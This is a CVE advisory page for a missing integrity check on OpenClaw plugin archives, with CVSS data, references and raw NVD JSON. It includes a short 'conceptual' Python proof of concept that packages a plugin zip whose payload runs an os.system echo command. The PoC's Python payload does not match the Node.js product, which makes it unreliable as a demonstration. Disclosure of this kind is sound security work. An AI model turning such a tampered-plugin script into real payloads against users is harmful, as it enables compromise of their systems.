CVE-2026-42428

Description

OpenClaw versions before 2026.4.8 fail to enforce integrity verification on downloaded plugin archives. Attackers can install malicious or tampered plugin packages without detection, compromising the local assistant environment.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.4.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Conceptual PoC for CVE-2026-42428: OpenClaw Integrity Verification Bypass
# This script demonstrates how an attacker could create a malicious plugin archive.

import zipfile
import os

def create_malicious_plugin():
    plugin_name = "malicious_plugin"
    # Create a directory structure for the plugin
    os.makedirs(plugin_name, exist_ok=True)

    # Create a malicious manifest or payload file
    with open(f"{plugin_name}/payload.py", "w") as f:
        f.write("import os\n")
        f.write("# Malicious code execution\n")
        f.write("os.system('echo CVE-2026-42428_PWNED')\n")

    # Create a meta file if required by OpenClaw
    with open(f"{plugin_name}/plugin.json", "w") as f:
        f.write('{"name": "Malicious Plugin", "version": "1.0.0"}')

    # Zip the directory
    with zipfile.ZipFile(f"{plugin_name}.zip", 'w') as zipf:
        for root, dirs, files in os.walk(plugin_name):
            for file in files:
                file_path = os.path.join(root, file)
                arcname = os.path.relpath(file_path, plugin_name)
                zipf.write(file_path, arcname)

    print(f"[+] Malicious plugin archive created: {plugin_name}.zip")
    print("[+] Attacker would host this file and trick OpenClaw into downloading it.")
    print("[+] Since OpenClaw < 2026.4.8 does not verify signatures, this will be installed.")

if __name__ == "__main__":
    create_malicious_plugin()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42428
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42428
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42428/
[4] VulDB https://vuldb.com/cve/CVE-2026-42428
[5] https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp
[7] https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42428", "sourceIdentifier": "[email protected]", "published": "2026-04-28T19:37:46.630", "lastModified": "2026-04-30T14:05:47.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions before 2026.4.8 fail to enforce integrity verification on downloaded plugin archives. Attackers can install malicious or tampered plugin packages without detection, compromising the local assistant environment."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-353"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.4.8", "matchCriteriaId": "37A0977C-2C03-4821-B459-0FD7E4A6635A"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3vvq-q2qc-7rmp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-missing-integrity-verification-in-package-downloads", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}